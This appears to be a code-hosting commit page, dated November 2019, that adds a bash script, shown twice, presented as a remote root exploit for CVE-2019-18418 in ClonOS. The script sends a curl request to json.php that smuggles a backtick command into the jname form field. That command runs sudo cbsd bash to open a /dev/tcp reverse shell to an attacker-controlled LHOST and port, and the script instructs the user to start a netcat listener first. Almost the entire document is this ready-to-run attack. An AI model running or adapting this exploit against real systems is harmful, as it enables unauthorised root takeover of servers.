bcoles · November 4, 2019 13:30 · bcoles · Nov 4, 2019
diff --git a/clonos-root-rce.sh b/clonos-root-rce.sh
 #!/bin/bash
 # clonos-root-rce
 # Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
 # Note: Start netcat listener on LHOST:LPORT first

 RHOST="172.16.191.240"
 LHOST="172.16.191.165"
 LPORT=1337

 curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
	#!/bin/bash
	# clonos-root-rce
	# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
	# Note: Start netcat listener on LHOST:LPORT first

	RHOST="172.16.191.240"
	LHOST="172.16.191.165"
	LPORT=1337

	curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"